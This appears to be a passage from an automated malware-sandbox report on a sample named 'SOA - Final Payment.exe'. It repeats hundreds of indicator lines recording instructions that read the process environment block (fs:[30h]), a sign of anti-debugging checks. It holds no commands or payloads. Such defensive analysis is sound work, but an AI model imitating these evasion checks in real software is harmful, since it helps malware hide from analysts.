                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A118 mov eax, dword ptr fs:[00000030h]5_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A118 mov eax, dword ptr fs:[00000030h]5_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131A118 mov eax, dword ptr fs:[00000030h]5_2_0131A118
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01309179 mov eax, dword ptr fs:[00000030h]5_2_01309179
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126F172 mov eax, dword ptr fs:[00000030h]5_2_0126F172
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345152 mov eax, dword ptr fs:[00000030h]5_2_01345152
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01308158 mov eax, dword ptr fs:[00000030h]5_2_01308158
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269148 mov eax, dword ptr fs:[00000030h]5_2_01269148
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269148 mov eax, dword ptr fs:[00000030h]5_2_01269148
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269148 mov eax, dword ptr fs:[00000030h]5_2_01269148
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269148 mov eax, dword ptr fs:[00000030h]5_2_01269148
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C156 mov eax, dword ptr fs:[00000030h]5_2_0126C156
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01276154 mov eax, dword ptr fs:[00000030h]5_2_01276154
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01276154 mov eax, dword ptr fs:[00000030h]5_2_01276154
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov eax, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov eax, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov ecx, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov eax, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01304144 mov eax, dword ptr fs:[00000030h]5_2_01304144
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277152 mov eax, dword ptr fs:[00000030h]5_2_01277152
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013211A4 mov eax, dword ptr fs:[00000030h]5_2_013211A4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013211A4 mov eax, dword ptr fs:[00000030h]5_2_013211A4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013211A4 mov eax, dword ptr fs:[00000030h]5_2_013211A4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013211A4 mov eax, dword ptr fs:[00000030h]5_2_013211A4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128B1B0 mov eax, dword ptr fs:[00000030h]5_2_0128B1B0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B0185 mov eax, dword ptr fs:[00000030h]5_2_012B0185
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F019F mov eax, dword ptr fs:[00000030h]5_2_012F019F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F019F mov eax, dword ptr fs:[00000030h]5_2_012F019F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F019F mov eax, dword ptr fs:[00000030h]5_2_012F019F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F019F mov eax, dword ptr fs:[00000030h]5_2_012F019F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A197 mov eax, dword ptr fs:[00000030h]5_2_0126A197
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A197 mov eax, dword ptr fs:[00000030h]5_2_0126A197
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A197 mov eax, dword ptr fs:[00000030h]5_2_0126A197
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132C188 mov eax, dword ptr fs:[00000030h]5_2_0132C188
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132C188 mov eax, dword ptr fs:[00000030h]5_2_0132C188
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012C7190 mov eax, dword ptr fs:[00000030h]5_2_012C7190
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012951EF mov eax, dword ptr fs:[00000030h]5_2_012951EF
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013171F9 mov esi, dword ptr fs:[00000030h]5_2_013171F9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012751ED mov eax, dword ptr fs:[00000030h]5_2_012751ED
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013461E5 mov eax, dword ptr fs:[00000030h]5_2_013461E5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A01F8 mov eax, dword ptr fs:[00000030h]5_2_012A01F8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013361C3 mov eax, dword ptr fs:[00000030h]5_2_013361C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013361C3 mov eax, dword ptr fs:[00000030h]5_2_013361C3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AD1D0 mov eax, dword ptr fs:[00000030h]5_2_012AD1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AD1D0 mov ecx, dword ptr fs:[00000030h]5_2_012AD1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov eax, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov eax, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov ecx, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov eax, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012EE1D0 mov eax, dword ptr fs:[00000030h]5_2_012EE1D0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013451CB mov eax, dword ptr fs:[00000030h]5_2_013451CB
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A020 mov eax, dword ptr fs:[00000030h]5_2_0126A020
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C020 mov eax, dword ptr fs:[00000030h]5_2_0126C020
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133903E mov eax, dword ptr fs:[00000030h]5_2_0133903E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133903E mov eax, dword ptr fs:[00000030h]5_2_0133903E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133903E mov eax, dword ptr fs:[00000030h]5_2_0133903E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133903E mov eax, dword ptr fs:[00000030h]5_2_0133903E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F4000 mov ecx, dword ptr fs:[00000030h]5_2_012F4000
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E016 mov eax, dword ptr fs:[00000030h]5_2_0128E016
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E016 mov eax, dword ptr fs:[00000030h]5_2_0128E016
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E016 mov eax, dword ptr fs:[00000030h]5_2_0128E016
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0128E016 mov eax, dword ptr fs:[00000030h]5_2_0128E016
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F106E mov eax, dword ptr fs:[00000030h]5_2_012F106E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345060 mov eax, dword ptr fs:[00000030h]5_2_01345060
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov ecx, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01281070 mov eax, dword ptr fs:[00000030h]5_2_01281070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129C073 mov eax, dword ptr fs:[00000030h]5_2_0129C073
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED070 mov ecx, dword ptr fs:[00000030h]5_2_012ED070
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131705E mov ebx, dword ptr fs:[00000030h]5_2_0131705E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131705E mov eax, dword ptr fs:[00000030h]5_2_0131705E
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01272050 mov eax, dword ptr fs:[00000030h]5_2_01272050
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129B052 mov eax, dword ptr fs:[00000030h]5_2_0129B052
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F6050 mov eax, dword ptr fs:[00000030h]5_2_012F6050
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013360B8 mov eax, dword ptr fs:[00000030h]5_2_013360B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013360B8 mov ecx, dword ptr fs:[00000030h]5_2_013360B8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013080A8 mov eax, dword ptr fs:[00000030h]5_2_013080A8
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D08D mov eax, dword ptr fs:[00000030h]5_2_0126D08D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0127208A mov eax, dword ptr fs:[00000030h]5_2_0127208A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FD080 mov eax, dword ptr fs:[00000030h]5_2_012FD080
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012FD080 mov eax, dword ptr fs:[00000030h]5_2_012FD080
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01275096 mov eax, dword ptr fs:[00000030h]5_2_01275096
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A909C mov eax, dword ptr fs:[00000030h]5_2_012A909C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129D090 mov eax, dword ptr fs:[00000030h]5_2_0129D090
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129D090 mov eax, dword ptr fs:[00000030h]5_2_0129D090
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0126A0E3
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012950E4 mov eax, dword ptr fs:[00000030h]5_2_012950E4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012950E4 mov ecx, dword ptr fs:[00000030h]5_2_012950E4
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012780E9 mov eax, dword ptr fs:[00000030h]5_2_012780E9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F60E0 mov eax, dword ptr fs:[00000030h]5_2_012F60E0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C0F0 mov eax, dword ptr fs:[00000030h]5_2_0126C0F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012B20F0 mov ecx, dword ptr fs:[00000030h]5_2_012B20F0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov ecx, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012870C0 mov eax, dword ptr fs:[00000030h]5_2_012870C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_013450D9 mov eax, dword ptr fs:[00000030h]5_2_013450D9
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED0C0 mov eax, dword ptr fs:[00000030h]5_2_012ED0C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012ED0C0 mov eax, dword ptr fs:[00000030h]5_2_012ED0C0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F20DE mov eax, dword ptr fs:[00000030h]5_2_012F20DE
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012990DB mov eax, dword ptr fs:[00000030h]5_2_012990DB
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129F32A mov eax, dword ptr fs:[00000030h]5_2_0129F32A
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01267330 mov eax, dword ptr fs:[00000030h]5_2_01267330
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133132D mov eax, dword ptr fs:[00000030h]5_2_0133132D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133132D mov eax, dword ptr fs:[00000030h]5_2_0133132D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA30B mov eax, dword ptr fs:[00000030h]5_2_012AA30B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA30B mov eax, dword ptr fs:[00000030h]5_2_012AA30B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012AA30B mov eax, dword ptr fs:[00000030h]5_2_012AA30B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F930B mov eax, dword ptr fs:[00000030h]5_2_012F930B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F930B mov eax, dword ptr fs:[00000030h]5_2_012F930B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F930B mov eax, dword ptr fs:[00000030h]5_2_012F930B
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126C310 mov ecx, dword ptr fs:[00000030h]5_2_0126C310
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01290310 mov ecx, dword ptr fs:[00000030h]5_2_01290310
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0131437C mov eax, dword ptr fs:[00000030h]5_2_0131437C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0132F367 mov eax, dword ptr fs:[00000030h]5_2_0132F367
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277370 mov eax, dword ptr fs:[00000030h]5_2_01277370
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277370 mov eax, dword ptr fs:[00000030h]5_2_01277370
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01277370 mov eax, dword ptr fs:[00000030h]5_2_01277370
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0133A352 mov eax, dword ptr fs:[00000030h]5_2_0133A352
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F2349 mov eax, dword ptr fs:[00000030h]5_2_012F2349
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D34C mov eax, dword ptr fs:[00000030h]5_2_0126D34C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126D34C mov eax, dword ptr fs:[00000030h]5_2_0126D34C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov ecx, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012F035C mov eax, dword ptr fs:[00000030h]5_2_012F035C
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01345341 mov eax, dword ptr fs:[00000030h]5_2_01345341
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269353 mov eax, dword ptr fs:[00000030h]5_2_01269353
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01269353 mov eax, dword ptr fs:[00000030h]5_2_01269353
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A33A0 mov eax, dword ptr fs:[00000030h]5_2_012A33A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012A33A0 mov eax, dword ptr fs:[00000030h]5_2_012A33A0
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_012933A5 mov eax, dword ptr fs:[00000030h]5_2_012933A5
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129438F mov eax, dword ptr fs:[00000030h]5_2_0129438F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0129438F mov eax, dword ptr fs:[00000030h]5_2_0129438F
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0134539D mov eax, dword ptr fs:[00000030h]5_2_0134539D
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E388 mov eax, dword ptr fs:[00000030h]5_2_0126E388
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E388 mov eax, dword ptr fs:[00000030h]5_2_0126E388
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_0126E388 mov eax, dword ptr fs:[00000030h]5_2_0126E388
                Source: C:\Users\user\Desktop\SOA - Final Payment.exeCode function: 5_2_01268397 mov eax, dword ptr fs:[00000030h]5_2_01268397
